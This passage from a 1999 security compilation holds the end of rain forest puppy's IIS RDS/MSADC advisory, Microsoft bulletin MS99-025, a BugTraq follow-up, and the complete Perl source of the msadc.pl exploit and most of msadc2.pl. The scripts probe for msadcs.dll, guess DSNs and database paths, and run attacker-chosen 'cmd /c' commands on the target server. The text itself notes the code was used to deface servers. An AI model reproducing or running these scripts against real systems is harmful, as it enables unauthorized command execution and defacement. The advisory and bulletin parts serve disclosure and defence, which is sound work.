webserver, spending the last 5 minutes trying all the combinations of valid default .mdbs, valid DSNs, etc. Finally it cracks and you get one, and you run your command. Well, what if you want to run another command? Do you have to go through that rigmarole again? Well, not with my script. :) When you make a successful connection, it writes out a file called 'rds.save'. Then, you can just use the 'resume' switch (-R), with no other options. It will read in rds.save, and let you run a command against the successful connection again right away. Sound good so far? Ok, I'll briefly go through the command line options. - 5 - Command Line Options To run the program, just save this whole advisory to a file, such as msadc.pl. Then run "perl -x msadc.pl". Perl is smart and will figure out how to run the exploit at the end. No need to cut and paste. :) Ok, the command switches are as follows: -h this is the host to scan. You MUST either use either -h or -R. -d this is the delay between connections. Value is in number of seconds. I added this because hammering the RDS components caused the server to occasionally stop responding :) Defaults to 1. Use -d 0 to disable. -v verbose. This will print the ODBC error information. Really only for troubleshooting purposes. -e external dictionary file to use on step 5--the 'DSN dictionary guess' stage. The file should just be plaintext, one DSN name per line file with all the DSN names you want to try. Quite honestly a normal dictionary file won't do you much good. You can probably do pretty damn well with a few dozen or two good ones, like 'www', 'data', 'database', 'sql', etc. -R resume. You can still specify -v or -d with -R. This will cause the script to read in rds.save and execute the command on the last valid connection. -X perform an Index Server table dump instead. None of the other switches really apply here, other than -v (although -d still works, there's no need to slow down one query). This dumps the root paths from Index Server, which can be rather lengthy. I suggest you pipe the output into a file. Also, if there is a lot of return information, this command may take a while to complete. Be patient. And I don't suggest you use this command more than once a minute...it caused my P200 w/ 128 RAM to stop answering requests, and in general borked inetinfo.exe. If you do decide to CONTROL-C during the middle of the data download the script will save all received data into a file called 'raw.out', so you don't loose everything you've already received. NOTE: this is the raw data, which is in Unicode. - 6 - Random Q & A - "This or that function of the script is broken" -- Well, it wasn't broken when I used it, so you must of broke it. No, seriously. I've tested it on Linux, L0pht tested it on Solaris, and Vacuum tested it on NT (using Perl 5.005-03 for Windows). They worked for us. I've coded some various checks for errors, but nothing robust. But I know it worked for me. :) - "Why don't you code this in C?" -- Because I've been programming C/C++ for 8 years. I'm tired of it. I've been coding perl for 3, so it's new and fresh, and I'm just now starting to do interesting stuff. Plus the code is portable this way. Come on, where else can you have a piece of code that does network/socket level stuff that runs on NT, Linux, and Solaris with no changes??!? - "Or you going to port this to C?" -- It wouldn't be that hard at all, but wasn't planning on it. You have something against perl? - "What's the F in Russell F. Prigogine stand for?" -- Fabio. Fear the geese. - "Why do you act like this is a joke?" -- Because I don't get paid for doing this, I don't get donations, and I don't get any sexual gratification from this what-so-ever. I do this because I *like* to, because it's *FUN*--so damn it, I'm having fun! - "I don't get some of the jokes in the paper. Like what's FMP?" -- If you have to ask, you wouldn't understand. This advisory is teeming with inside jokes. RFP, FMP. - 7 - Signoff Ok, I've been coding the exploit, reading MS database propaganda (did I mention yet I hate database stuff?), and writing this damn advisory for a collective of 30 hours. About time I stop and never think about it again. :) So you have my best shot at the RDS exploit, even though I think there may be something pretty nifty hiding in the Data Shape Provider (or maybe Index Server). We'll just have to wait and see if/when Greg and Russ finally decide they can share their toys. Remember, I spent 2 days typing all this in an attempt to teach people something, rather than to just release the vanilla exploit. So if you want to label me irresponsible, well, I suppose I could have been more so. Moreover, I support eEye in what they did 100%. Russ says "there are numerous unwritten rules when it comes to security disclosures". Rules? Unwritten? Well, maybe eEye was unaware of these rules, since they're not written down. Future updates to this advisory and exploit code will be posted to www.technotronic.com/rfp/ Well, it's been fun. Until the next release (which may be sooner than you think ;) - rain forest puppy / R. F. Prigogine - - ADM / Wiretrip - - rfp@wiretrip.net - *** SPECIAL THANKS once again to Mudge and Weld from www.l0pht.com for helping me out on the preliminary assessment, and Mike Dinowitz from www.houseoffusion.com and Vacuum from www.technotronic.com for creative input. Time is creation. The future is just not there. - 8 - The Code!!!! Again, to run this, save this advisory to a file (for instance msadc.txt) and then run 'perl -x file' (ie perl -x msadc.txt). #!perl # # MSADC/RDS 'usage' (aka exploit) script # # by rain.forest.puppy # # Many thanks to Weld, Mudge, and Dildog from l0pht for helping me # beta test and find errors! use Socket; use Getopt::Std; getopts("e:vd:h:XR", \%args); print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n"; if (!defined $args{h} && !defined $args{R}) { print qq~ Usage: msadc.pl -h { -d -X -v } -h = host you want to scan (ip or domain) -d = delay between calls, default 1 second -X = dump Index Server path table, if available -v = verbose -e = external dictionary file for step 5 Or a -R will resume a command session ~; exit;} $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=""; if (defined $args{v}) { $verbose=1; } else {$verbose=0;} if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/); $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");} if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; } if (!defined $args{R}){ $ret = &has_msadc; die("Looks like msadcs.dll doesn't exist\n")if $ret==0} print "Please type the NT commandline you want to run (cmd /c assumed):\n" . "cmd /c "; $in=; chomp $in; $command="cmd /c " . $in ; if (defined $args{R}) {&load; exit;} print "\nStep 1: Trying raw driver to btcustmr.mdb\n"; &try_btcustmr; print "\nStep 2: Trying to make our own DSN..."; &make_dsn ? print "<>\n" : print "<>\n"; print "\nStep 3: Trying known DSNs..."; &known_dsn; print "\nStep 4: Trying known .mdbs..."; &known_mdb; if (defined $args{e}){ print "\nStep 5: Trying dictionary of DSN names..."; &dsn_dict; } else { "\nNo -e; Step 5 skipped.\n\n"; } print "Sorry Charley...maybe next time?\n"; exit; ############################################################################## sub sendraw { # ripped and modded from whisker sleep($delay); # it's a DoS on the server! At least on mine... my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub make_header { # make the HTTP request my $msadc=<Datasource creation successful<\/H2>/;}} } return 0;} ############################################################################## sub verify_exists { my ($page)=@_; my @results=sendraw("GET $page HTTP/1.0\n\n"); return $results[0];} ############################################################################## sub try_btcustmr { my @drives=("c","d","e","f"); my @dirs=("winnt","winnt35","winnt351","win","windows"); foreach $dir (@dirs) { print "$dir -> "; # fun status so you can see progress foreach $drive (@drives) { print "$drive: "; # ditto $reqlen=length( make_req(1,$drive,$dir) ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,$drive,$dir)); if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;} else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}} ############################################################################## sub odbc_error { my (@in)=@_; my $base; my $base = content_start(@in); if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; return $in[$base+4].$in[$base+5].$in[$base+6];} print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n"; print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;} ############################################################################## sub verbose { my ($in)=@_; return if !$verbose; print STDOUT "\n$in\n";} ############################################################################## sub save { my ($p1, $p2, $p3, $p4)=@_; open(OUT, ">rds.save") || print "Problem saving parameters...\n"; print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n"; close OUT;} ############################################################################## sub load { my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq="; open(IN,"; close(IN); $ip="$p[0]"; $ip=~s/\n//g; $ip.="." if ($ip=~/[a-z]$/); $target= inet_aton($ip) || die("inet_aton problems"); print "Resuming to $ip ..."; $p[3]="$p[3]"; $p[3]=~s/\n//g; $p[4]="$p[4]"; $p[4]=~s/\n//g; if($p[1]==1) { $reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]")); if (rdo_success(@results)){print "Success!\n";} else { print "failed\n"; verbose(odbc_error(@results));}} elsif ($p[1]==3){ if(run_query("$p[3]")){ print "Success!\n";} else { print "failed\n"; }} elsif ($p[1]==4){ if(run_query($drvst . "$p[3]")){ print "Success!\n"; } else { print "failed\n"; }} exit;} ############################################################################## sub create_table { my ($in)=@_; $reqlen=length( make_req(2,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(2,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 1 if $temp=~/Table 'AZZ' already exists/; return 0;} ############################################################################## sub known_dsn { # we want 'wicca' first, because if step 2 made the DSN, it's ready to go my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", "banner", "banners", "ads", "ADCDemo", "ADCTest"); foreach $dSn (@dsns) { print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ print "$dSn successful\n"; if(run_query("DSN=$dSn")){ print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else { print "Something's borked. Use verbose next time\n";}}} print "\n";} ############################################################################## sub is_access { my ($in)=@_; $reqlen=length( make_req(5,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; $reqlen=length( make_req(3,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(3,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## sub known_mdb { my @drives=("c","d","e","f","g"); my @dirs=("winnt","winnt35","winnt351","win","windows"); my $dir, $drive, $mdb; my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; # this is sparse, because I don't know of many my @sysmdbs=( "\\catroot\\icatalog.mdb", "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\certmdb.mdb", "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% my @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb", "\\cfusion\\cfapps\\security\\realm_.mdb", "\\cfusion\\cfapps\\security\\data\\realm.mdb", "\\cfusion\\database\\cfexamples.mdb", "\\cfusion\\database\\cfsnippets.mdb", "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", "\\cfusion\\brighttiger\\database\\cleam.mdb", "\\cfusion\\database\\smpolicy.mdb", "\\cfusion\\database\cypress.mdb", "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", "\\website\\cgi-win\\dbsample.mdb", "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \ foreach $drive (@drives) { foreach $dir (@dirs){ foreach $mdb (@sysmdbs) { print "."; if(create_table($drv . $drive . ":\\" . $dir . $mdb)){ print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n"; if(run_query($drv . $drive . ":\\" . $dir . $mdb)){ print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit; } else { print "Something's borked. Use verbose next time\n"; }}}}} foreach $drive (@drives) { foreach $mdb (@mdbs) { print "."; if(create_table($drv . $drive . $dir . $mdb)){ print "\n" . $drive . $dir . $mdb . " successful\n"; if(run_query($drv . $drive . $dir . $mdb)){ print "Success!\n"; save (4,4,$drive . $dir . $mdb,""); exit; } else { print "Something's borked. Use verbose next time\n"; }}}} } ############################################################################## sub hork_idx { print "\nAttempting to dump Index Server tables...\n"; print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw2(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/\x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; $d{"$1$2"}="";} foreach $c (keys %d){ print "$c\n"; } } else {print "Index server doesn't seem to be installed.\n"; }} ############################################################################## sub dsn_dict { open(IN, "<$args{e}") || die("Can't open external dictionary\n"); while(){ $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ print "$dSn successful\n"; if(run_query("DSN=$dSn")){ print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else { print "Something's borked. Use verbose next time\n";}}} print "\n"; close(IN);} ############################################################################## sub sendraw2 { # ripped and modded from whisker sleep($delay); # it's a DoS on the server! At least on mine... my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ print "Connected. Getting data"; open(OUT,">raw.out"); my @in; select(S); $|=1; print $pstr; while(){ print OUT $_; push @in, $_; print STDOUT ".";} close(OUT); select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { if($in[$c] =~/^\x0d\x0a/){ if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; } else { return $c+1; }}} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ print "\nServer returned an ADO miscofiguration message\nAborting.\n"; exit;} if($error=~/A Handler is required/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;} if($error=~/specified Handler has denied Access/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;}} ############################################################################## sub has_msadc { my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n"); my $base=content_start(@results); return 1 if($results[$base]=~/Content-Type: application\/x-varg/); return 0;} ############################################################################## EoF -=- Followup/update to IIS/RDS advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To: BugTraq Subject Update to ODBC/RDS vulnerabilities Date: Tue Sep 21 1999 12:07:54 Hello all, It's been a while since I've posted anything, and I promise it will be short this time. ;) Microsoft has released a patched Jet ODBC engine that will fix the ODBC problem as well as Mr. Cuartango's Excel vulnerabilities as well. Basically, this is a 3.51 engine retrofitted with a 'sandbox' restriction controlled by the following registry key: \\HKLM\Software\Microsoft\Jet\3.5\Engines\SandboxMode Also, as for the RDS problem, they recommended implementing custom handlers to limit invocation of the RDS component to legit uses. Custom handler support is controlled by the following registry key: \\HKLM\Software\Microsoft\DataFactory\HandlerInfo\handlerRequired Now, perhaps it's just me, but on three different NT boxes I have, which are various SP3 and 5 combos on NT4, patches installed as administrator, the permissions on these registry keys are Everyone -> Special Access, which includes Set Value. This basically means domain users can remotely disable handler and sandbox restrictions by changing the values of these keys. Hmmm. I've tested this, and it worked as expected. Also, Mnemonix pointed out an interesting aspect which I overlooked for the RDS vulnerability that really makes it more evil. The current limitation to the RDS exploit is that it requires a local file to 'attach' to, specifically a .mdb. Well, you can use UNC addresses for this file, so if you setup a Windows share on the internet, you can request your file off that, therefore bypassing the need for a local file. I've tested this, and it works as well. I am finishing updates to my RDS exploit program, which I'll probably release in the next week. It will implement all of this, plus clean up the code a bit. Also, I wanted to point out an ommision of credit in the RDS advisory. Matthew Astley, who I co-wrote the May 25th advisory with the original ODBC info, should have been given credit as well for the ODBC/Jet pipe problem. Apologies to Matthew. .rain.forest.puppy. -------------------------------------------------------------------------- If I had a signoff banner, it would be here. But I don't, so I'll fake it -------------------------------------------------------------------------- EoF -=- MS99-025: Microsoft advisory for RDS/IIS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Microsoft Security Bulletin (MS99-025) -------------------------------------- Re-Release: Unauthorized Access to IIS Servers through ODBC Data Access with RDS Originally Released as MS98-004: July 17, 1998 Re-Released as MS99-025: July 19, 1999 Revised: July 23, 1999 Summary ======= Microsoft has identified a vulnerability in Microsoft(r) Data Access Components (MDAC) that could allow a web site visitor to take unauthorized actions on a web site hosted using Internet Information Server. The vulnerability can be eliminated by reconfiguring or removing the affected components of MDAC. This vulnerability originally was reported in Microsoft Security Bulletin MS98-004, issued July 17, 1998. It was re-released on July 19, 1999, to remind customers of the need to address the vulnerability. It was updated on July 23, 1999, to discuss the need to remove sample files that are affected by the vulnerability, and to clarify that MDAC 2.0 is affected even if deployed as a clean installation. Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-025faq.asp. The FAQ contains instructions for eliminating the vulnerability. Issue ===== The RDS DataFactory object, a component of Microsoft Data Access Components (MDAC), exposes unsafe methods. When installed on a system running Internet Information Server 3.0 or 4.0, the DataFactory object may permit an otherwise unauthorized web user to perform privileged actions, including: - Allowing unauthorized users to execute shell commands on the IIS system as a privileged user. - On a multi-homed Internet-connected IIS system, using MDAC to tunnel SQL and other ODBC data requests through the public connection to a private back-end network. - Allowing unauthorized accessing to secured, non-published files on the IIS system. Affected Software Versions ========================== The vulnerability affects the Microsoft Data Access Components, when installed on a web server running Internet Information Server 3.0 or 4.0. Specifically: - MDAC 1.5 and 2.0 are affected - MDAC 2.1 is affected if installed as an upgrade from a previous version of MDAC, rather than a clean installation - Any version of MDAC is affected if Sample Pages for RDS are installed. NOTE: Sample Pages for RDS are provided as part of the Windows 4.0 Option Pack and the MDAC 2.0 Software Development Kit. They are not installed by default in the Option Pack, but are installed by default in the MDAC 2.0 SDK. NOTE: MDAC 1.5 and IIS are installed by default installations of the Windows NT 4.0 Option Pack. NOTE: IIS can be installed as part of other Microsoft products, such as Microsoft BackOffice and Microsoft Site Server. MDAC can be installed as part of other Microsoft products, such as Visual C and Microsoft Office. Patch Availability ================== This vulnerability requires a configuration change to eliminate it, rather than a patch. Details of the specific changes needed are available at http://www.microsoft.com/security/bulletins/MS99-025faq.asp. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-025: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-025faq.asp - Microsoft Knowledge Base (KB) article Q184375, Security Implications of RDS 1.5, IIS, and ODBC, http://support.microsoft.com/support/kb/articles/q184/3/75.asp - Microsoft Universal Data Access Download Page, http://www.microsoft.com/data/download.htm - Installing MDAC Q&A, http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm - Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp - IIS Security Checklist, http://www.microsoft.com/security/products/iis/CheckList.asp Obtaining Support on this Issue =============================== Microsoft Data Access Components (MDAC) is a fully supported set of technologies. If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp. Acknowledgments =============== Microsoft acknowledges Greg Gonzalez of ITE (http://www.ite.com) for bringing additional information regarding this vulnerability to our attention, and .Rain.Forest.Puppy for identifying the involvement of Sample Pages for RDS. Microsoft also acknowledges Russ Cooper of NTBugTraq (http://www.ntbugtraq.com) for his assistance around this issue. Revisions ========= - July 19, 1999: Bulletin Created as re-release of MS98-004. - July 23, 1999: Bulletin updated to discuss involvement of Sample Pages for RDS, and to clarify status of MDAC 2.0. ------------------------------------------------------------------------ THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. msadc2.pl ~~~~~~~~~ Before the preceding this was the code being commonly used to exploit and deface the NT servers ... Source: PSS url:http://packetstorm.securify.com/9911-exploits/msadc2.pl #!/usr/bin/perl # # MSADC/RDS 'usage' (aka exploit) script version 2 # # by rain forest puppy # # - added UNC support, really didn't clean up code, but oh well use Socket; use Getopt::Std; getopts("e:vd:h:XRVNwcu:s:", \%args); print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n"; if (!defined $args{h} && !defined $args{R}) { print qq~ Usage: msadc.pl -h { -d -X -v } -h = host you want to scan (ip or domain) -d = delay between calls, default 1 second -X = dump Index Server path table, if available -N = query VbBusObj for NetBIOS name -V = use VbBusObj instead of ActiveDataFactory -v = verbose -e = external dictionary file for step 5 -u <\\\\host\\share\\file> = use UNC file -w = Windows 95 instead of Windows NT -c = v1 compatibility (three step query) -s = run only step Or a -R will resume a (v2) command session ~; exit;} ########################################################### # config data @drives=("c","d","e","f","g","h"); @sysdirs=("winnt","winnt35","winnt351","win","windows"); # we want 'wicca' first, because if step 2 made the DSN, it's ready to go @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", "banner", "banners", "ads", "ADCDemo", "ADCTest"); # this is sparse, because I don't know of many @sysmdbs=( "\\catroot\\icatalog.mdb", "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\certmdb.mdb", "\\system32\\ias\\ias.mdb", "\\system32\\ias\\dnary.mdb", "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb", "\\cfusion\\cfapps\\security\\realm_.mdb", "\\cfusion\\cfapps\\security\\data\\realm.mdb", "\\cfusion\\database\\cfexamples.mdb", "\\cfusion\\database\\cfsnippets.mdb", "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", "\\cfusion\\brighttiger\\database\\cleam.mdb", "\\cfusion\\database\\smpolicy.mdb", "\\cfusion\\database\cypress.mdb", "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", "\\website\\cgi-win\\dbsample.mdb", "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \ ########################################################### $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=""; if (defined $args{v}) { $verbose=1; } else {$verbose=0;} if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} if(!defined $args{R}){ $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");} if (!defined $args{R}){ $ret = &has_msadc; } if (defined $args{X}) { &hork_idx; exit; } if (defined $args{N}) { &get_name; exit; } if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} if (defined $args{R}) { &load; exit; } print "Type the command line you want to run ($comm assumed):\n" . "$comm "; $in=; chomp $in; $command="$comm " . $in ; if (!defined $args{s} || $args{s}==1){ print "\nStep 1: Trying raw driver to btcustmr.mdb\n"; &try_btcustmr;} if (!defined $args{s} || $args{s}==2){ print "\nStep 2: Trying to make our own DSN..."; if (&make_dsn){ print "<>\n"; sleep(3); } else { print "<>\n"; }} # we need to sleep to let the server catchup if (!defined $args{s} || $args{s}==3){ print "\nStep 3: Trying known DSNs..."; &known_dsn;} if (!defined $args{s} || $args{s}==4){ print "\nStep 4: Trying known .mdbs..."; &known_mdb;} if (!defined $args{s} || $args{s}==5){ if (defined $args{u}){ print "\xStep 5: Trying UNC..."; &use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }} if (!defined $args{s} || $args{s}==6){ if (defined $args{e}){ print "\nStep 6: Trying dictionary of DSN names..."; &dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }} print "\n\nNo luck, guess you'll have to use a real hack, eh?\n"; exit; ############################################################################## sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ open(OUT,">raw.out"); my @in; select(S); $|=1; print $pstr; while(){ print OUT $_; push @in, $_; print STDOUT "." if(defined $args{X});} close(OUT); select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub make_header { # make the HTTP request my $aa, $bb; if (defined $args{V}){ $aa="VbBusObj.VbBusObjCls.GetRecordset"; $bb="2"; } else { $aa="AdvancedDataFactory.Query"; $bb="3";} $msadc=<Datasource creation successful<\/H2>/;}} } return 0;} ############################################################################## sub verify_exists { my ($page)=@_; my @results=sendraw("GET $page HTTP/1.0\n\n"); return $results[0];} ############################################################################## sub try_btcustmr { foreach $dir (@sysdirs) { print "$dir -> "; # fun status so you can see progress foreach $drive (@drives) { print "$drive: "; # ditto $reqlen=length( make_req(1,$drive,$dir) ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,$drive,$dir)); if (rdo_success(@results)){print "Success!\n"; save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;"); exit;} else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}} ############################################################################## sub odbc_error { my (@in)=@_; my $base; my $base = content_start(@in); if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; return $in[$base+4].$in[$base+5].$in[$base+6];} print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n"; print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;} ############################################################################## sub verbose { my ($in)=@_; return if !$verbose; print STDOUT "\n$in\n";} ############################################################################## sub save { my ($p1)=@_; my $ropt=""; open(OUT, ">rds.save") || print "Problem saving parameters...\n"; if (defined $args{c}){ $ropt="c ";} if (defined $args{V}){ $ropt.="V ";} if (defined $args{w}){ $ropt.="w ";} print OUT "v2\n$ip\n$ropt\n$p1\n"; close OUT;} ############################################################################## sub load { my ($action)=@_; my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};"; open(IN,"; close(IN); die("Wrong rds.save version") if $p[0] ne "v2\n"; $ip="$p[1]"; $ip=~s/\n//g; $target= inet_aton($ip) || die("inet_aton problems"); print "Resuming to $ip ..."; @switches=split(/ /,$p[2]); foreach $switch (@switches) { $args{$switch}="1";} if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} print "Type the command line you want to run ($comm assumed):\n" . "$comm "; $in=; chomp $in; $command="$comm " . $in ; $torun="$p[3]"; $torun=~s/\n//g; if($torun=~/btcustmr/){ $args{'c'}="1";} # this is a kludge to make it work if($torun=~/^dbq/){ $torun=$drvst.$torun; } if(run_query("$torun")){ print "Success!\n";} else { print "failed\n"; } exit;} ############################################################################## sub create_table { return 1 if (!defined $args{c}); return 1 if (defined $args{V}); my ($in)=@_; $reqlen=length( make_req(2,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(2,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 1 if $temp=~/Table 'AZZ' already exists/; return 0;} ############################################################################## sub known_dsn { foreach $dSn (@dsns) { print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ if(run_query("DSN=$dSn")){ print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";} ############################################################################## sub is_access { my ($in)=@_; return 1 if (!defined $args{c}); return 1 if (defined $args{V}); $reqlen=length( make_req(5,$in,"") ) - 28; $reqlenlen=length( 